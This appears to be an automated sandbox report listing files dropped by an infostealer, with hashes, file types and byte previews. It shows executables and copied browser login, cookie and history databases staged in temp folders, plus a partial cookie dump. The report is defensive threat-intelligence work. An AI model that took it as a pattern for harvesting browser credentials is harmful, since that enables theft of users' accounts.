SSDEEP:	3072:0Nh7rny2puIm199zIsd9IZ16KP8cfYLcgML3:0b7G2wbdLm6KP8cwO
MD5:	BBB0D3DDAABA530DC111E665A4891217
SHA1:	CEA5A71FF0305083A9ADD3C4755A8E54AB10F869
SHA-256:	4FA3CC89F5C3CFA0F794C1F849B0EA8D081E5C0E69D7FB2D834CAED08D1140C0
SHA-512:	EBF248BB57355DE887770D91EA2B40A98E0760335A57DC6EA92AB89E65177CAE95EB1C08116855C8EEECA81D4022CCDDE2FCA7CF34FAD68B4FF0E14B74C93B89
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....p.a.........." ..0.................. ........... .......................@...........`.....................................O.......................0A... ......L................................................ ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc....... ......................@..B........................H...........\|...........\W..p............................................0..,.......~....s .......o!......r...pso.....r...po"...&.o#...o$....o%....o&...&...r/..po"...&.o'...o(....+A.o)...t.....,...+..r9..po"...&%o....o%....r?..po"...&o+....o%....o....-....,..o......,.........os........o,...o"...&.rG..po"...&.o&...&.rQ..po"...&.o-....o%....r_..po....&....o!....(......op...Q.o/...*......_.M........0..n.......~....s ...%..rc..pso....%r...po"...&.o#...o$....o%...%o&...&%rQ..po"

C:\Users\user\AppData\Local\Temp\System.Data.SQLite.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\8427.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	393520
Entropy (8bit):	6.124594999135733
Encrypted:	false
SSDEEP:	12288:5vXCrbE724yjK3r/fFNFfcaFeFOFwcGF6cmFWc0FWc8cIcKcUFJFpcNcHc7cbchs:h8dDm3r/7
MD5:	55C797383DBBBFE93C0FE3215B99B8EC
SHA1:	1B089157F3D8AE64C62EA15CDAD3D82EAFA1DF4B
SHA-256:	5FAC5A9E9B8BBDAD6CF661DBF3187E395914CD7139E34B725906EFBB60122C0D
SHA-512:	648A7DA0BCDA6CCD31B4D6CDC1C90C3BC3C11023FCCEB569F1972B8F6AB8F92452D1A80205038EDCF409669265B6756BA0DA6B1A734BD1AE4B6C527BBEBB8757
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....p.a.........." ..0.................. ........... ....................... ...........`.................................T...O.......p...............0A........................................................... ............... ..H............text....... ...................... ..`.rsrc...p...........................@..@.reloc..............................@..B........................H........+..<...........LB..P...........................................:.(;.....}......{....:.(;.....}......{.......0...........~<...}.....r...p}........(.....(......~<...(=...,z.....s,...}.......}.......}............{............%......(>....%...=....%...!....%...%.........%....%.........s....(....vr)..p.(\...,...}......}......{....z.{....,......(>...o?...s@...z..0..'........{....-..(......o........(N.....}.......................0..T........{....,K.{....oA....+...

C:\Users\user\AppData\Local\Temp\bab2f53b-9404-4fd1-8488-5d9c9f23db90

Download File

Process:	C:\Users\user\AppData\Local\Temp\8427.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\f630489f-7fe1-40ce-83c2-53611d887602

Download File

Process:	C:\Users\user\AppData\Local\Temp\8427.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.8180424350137764
Encrypted:	false
SSDEEP:	96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5:	349E6EB110E34A08924D92F6B334801D
SHA1:	BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:	2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\latestX.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\39D.exe
File Type:	PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	5874968
Entropy (8bit):	7.70017826439962
Encrypted:	false
SSDEEP:	49152:MMcDmMRlBdzs3EThgR0uEqBXLdcJAbtNmbOHaGhEospqOziZXAfrrARS7JL2ozPX:dcdrCET8XeospuZXAf0EJyocDKIVDT05
MD5:	BAE29E49E8190BFBBF0D77FFAB8DE59D
SHA1:	4A6352BB47C7E1666A60C76F9B17CA4707872BD9
SHA-256:	F91E4FF7811A5848561463D970C51870C9299A80117A89FB86A698B9F727DE87
SHA-512:	9E6CF6519E21143F9B570A878A5CA1BBA376256217C34AB676E8D632611D468F277A0D6F946AB8705121002D96A89274F38458AFFE3DF3A3A1C75E336D7D66E2
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 71%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d....?.d...............&.....xY................@..............................Z.....@.Y...`... ...............................................Y.p.....Y......PY......\|Y..)....Z.0........................... <Y.(.....................Y.`............................text...............................`..`.data.....W.......W.................@....rdata...>....Y..@....X.............@..@.pdata.......PY......6Y.............@..@.xdata..L....pY......PY.............@..@.bss.....-....Y..........................idata..p.....Y......dY.............@....CRT....`.....Y......pY.............@....tls..........Y......rY.............@....rsrc.........Y......tY.............@....reloc..0.....Z......xY.............@..B........................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tempAVSD2_TFJlRkh1w\02zdBXl47cvzHistory

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
Category:	dropped
Size (bytes):	159744
Entropy (8bit):	0.7873599747470391
Encrypted:	false
SSDEEP:	96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
MD5:	6A6BAD38068B0F6F2CADC6464C4FE8F0
SHA1:	4E3B235898D8E900548613DDB6EA59CDA5EB4E68
SHA-256:	0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
SHA-512:	BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tempAVSD2_TFJlRkh1w\02zdBXl47cvzcookies.sqlite

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	0.08235737944063153
Encrypted:	false
SSDEEP:	12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5:	369B6DD66F1CAD49D0952C40FEB9AD41
SHA1:	D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256:	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
SHA-512:	771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tempAVSD2_TFJlRkh1w\2jQJv37iJ0lzHistory

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	126976
Entropy (8bit):	0.47147045728725767
Encrypted:	false
SSDEEP:	96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
MD5:	A2D1F4CF66465F9F0CAC61C4A95C7EDE
SHA1:	BA6A845E247B221AAEC96C4213E1FD3744B10A27
SHA-256:	B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
SHA-512:	C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tempAVSD2_TFJlRkh1w\3b6N2Xdh3CYwWeb Data

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tempAVSD2_TFJlRkh1w\3b6N2Xdh3CYwplaces.sqlite

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
File Type:	SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	5242880
Entropy (8bit):	0.037963276276857943
Encrypted:	false
SSDEEP:	192:58rJQaXoMXp0VW9FxWZWdgokBQNba9D3DO/JxW/QHI:58r54w0VW3xWZWdOBQFal3dQ
MD5:	C0FDF21AE11A6D1FA1201D502614B622
SHA1:	11724034A1CC915B061316A96E79E9DA6A00ADE8
SHA-256:	FD4EB46C81D27A9B3669C0D249DF5CE2B49E5F37B42F917CA38AB8831121ADAC
SHA-512:	A6147C196B033725018C7F28C1E75E20C2113A0C6D8172F5EABCB8FF334EA6CE10B758FFD1D22D50B4DB5A0A21BCC15294AC44E94D973F7A3EB9F8558F31769B
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ ...................&...................K..................................j.....-a>.~...\|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tempAVSD2_TFJlRkh1w\8ghN89CsjOW1Login Data For Account

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tempAVSD2_TFJlRkh1w\D87fZN3R3jFeWeb Data

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tempAVSD2_TFJlRkh1w\D87fZN3R3jFeplaces.sqlite

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
File Type:	SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	5242880
Entropy (8bit):	0.037963276276857943
Encrypted:	false
SSDEEP:	192:58rJQaXoMXp0VW9FxWZWdgokBQNba9D3DO/JxW/QHI:58r54w0VW3xWZWdOBQFal3dQ
MD5:	C0FDF21AE11A6D1FA1201D502614B622
SHA1:	11724034A1CC915B061316A96E79E9DA6A00ADE8
SHA-256:	FD4EB46C81D27A9B3669C0D249DF5CE2B49E5F37B42F917CA38AB8831121ADAC
SHA-512:	A6147C196B033725018C7F28C1E75E20C2113A0C6D8172F5EABCB8FF334EA6CE10B758FFD1D22D50B4DB5A0A21BCC15294AC44E94D973F7A3EB9F8558F31769B
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ ...................&...................K..................................j.....-a>.~...\|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tempAVSD2_TFJlRkh1w\Ei8DrAmaYu9KLogin Data

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tempAVSD2_TFJlRkh1w\IWPfiAXUTJTSHistory

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
Category:	dropped
Size (bytes):	159744
Entropy (8bit):	0.7873599747470391
Encrypted:	false
SSDEEP:	96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
MD5:	6A6BAD38068B0F6F2CADC6464C4FE8F0
SHA1:	4E3B235898D8E900548613DDB6EA59CDA5EB4E68
SHA-256:	0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
SHA-512:	BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tempAVSD2_TFJlRkh1w\JX0OQi4nZtiqWeb Data

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tempAVSD2_TFJlRkh1w\QdX9ITDLyCRBLogin Data

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.8180424350137764
Encrypted:	false
SSDEEP:	96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5:	349E6EB110E34A08924D92F6B334801D
SHA1:	BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:	2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tempAVSD2_TFJlRkh1w\UPG2LoPXwc7OHistory

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	126976
Entropy (8bit):	0.47147045728725767
Encrypted:	false
SSDEEP:	96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
MD5:	A2D1F4CF66465F9F0CAC61C4A95C7EDE
SHA1:	BA6A845E247B221AAEC96C4213E1FD3744B10A27
SHA-256:	B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
SHA-512:	C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tempAVSD2_TFJlRkh1w\o0qT3dWYBP7ZWeb Data

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tempAVSD2_TFJlRkh1w\oOPEmFmu_xsJCookies

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
Category:	dropped
Size (bytes):	28672
Entropy (8bit):	2.5793180405395284
Encrypted:	false
SSDEEP:	96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
MD5:	41EA9A4112F057AE6BA17E2838AEAC26
SHA1:	F2B389103BFD1A1A050C4857A995B09FEAFE8903
SHA-256:	CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
SHA-512:	29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Cookies\Chrome_Default.txt

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
File Type:	ASCII text, with very long lines (769), with CRLF line terminators
Category:	dropped
Size (bytes):	6085
Entropy (8bit):	6.038274200863744
Encrypted:	false
SSDEEP:	96:gxsumX/xKO2KbcRfbZJ5Jxjxcx1xcbza5BC126oxgxA26Fxr/CxbTxqCGYURxOeb:gWFXZQHRFJ5Pts7c3avC126Ygb6Lr/WY
MD5:	ACB5AD34236C58F9F7D219FB628E3B58
SHA1:	02E39404CA22F1368C46A7B8398F5F6001DB8F5C
SHA-256:	05E5013B848C2E619226F9E7A084DC7DCD1B3D68EE45108F552DB113D21B49D1
SHA-512:	5895F39765BA3CEDFD47D57203FD7E716347CD79277EDDCDC83A729A86E2E59F03F0E7B6B0D0E7C7A383755001EDACC82171052BE801E015E6BF7E6B9595767F
Malicious:	false
Reputation:	unknown
Preview:	.google.com.TRUE./.TRUE.1712145003.NID.ENC893_djEw3+k+F2A/rK1XOX2BXUq6pY2LBCOzoXODiJnrrvDbDsPWiYwKZowg9PxHqkTm37HpwC52rXpnuUFrQMpV3iKtdSHegOm+XguZZ6tGaCY2hGVyR8JgIqQma1WLXyhCiWqjou7/c3qSeaKyNoUKHa4TULX4ZnNNtXFoCuZcBAAy4tYcz+0BF4j/0Pg+MgV+s7367kYcjO4q3zwc+XorjSs7PlgWlYrcc55rCJplhJ+H13M00HIdLm+1t9PACck2xxSWX2DsA61sEDJCHEc=_b3i0u6LLcKCMUaF/UlQgEPSL9PtLZ21CuT1dJkfCzME=..support.microsoft.com.FALSE./.TRUE.1696413835..AspNetCore.AuthProvider.ENC893_djEwVWJCCNyFkY3ZM/58ZZ/F/bz9H1yPvi6FOaroXC+KU8E=_b3i0u6LLcKCMUaF/UlQgEPSL9PtLZ21CuT1dJkfCzME=..support.microsoft.com.TRUE./signin-oidc.TRUE.1696414135..AspNetCore.Correlation.mdRqPJxLbpyv7vX0eK9YkTR-xwcrW3VBLE4Y3HEvxuU.ENC893_djEwBAKLrkJs5PZ6BD7Beoa9N/bOSh5JtRch10gZT+E=_b3i0u6LLcKCMUaF/UlQgEPSL9PtLZ21CuT1dJkfCzME=..support.microsoft.com.TRUE./signin-oidc.TRUE.1696414135..AspNetCore.OpenIdConnect.Nonce.CfDJ8Kiuy_B5JgFMo7PeP95NLhqwcJ8koDy5pXkfoWsb5SbbU2hVCbsH2qt9GF_OVCqFkLEwhvzeADNQOF5RSmkDfh5RqfqlOkx5QWo4Lltvwb0CvwBFD8ujlm3BAglOeGca3ZatkLMUkH

C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\information.txt

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	6556
Entropy (8bit):	5.443717308239428
Encrypted:	false
SSDEEP:	96:t0M0EwGfbfJHBd8pvBUfioHmobKNvG/LKfokNV+UcgID+:/b/KgioGobKNvG/uQk5P
MD5:	E6C86768C435D8C60911B2AD1895E47C
SHA1:	7904C59D85A78AD46F21934F6BC23A2728A2DE6E
SHA-256:	182F9448C4345115107E35B4EA5BE4847D08F71CAFB0736F86BD2AFD36A68FE6
SHA-512:	33F7179D8A35488F91D3CEBD40B40F8BE55F909CA459109CAD129886C6EE294551523B189B8C113D2A351ACD7B12EFC40A4BA7C871858B6F9231442A32E5A5EC
Malicious:	false
Reputation:	unknown
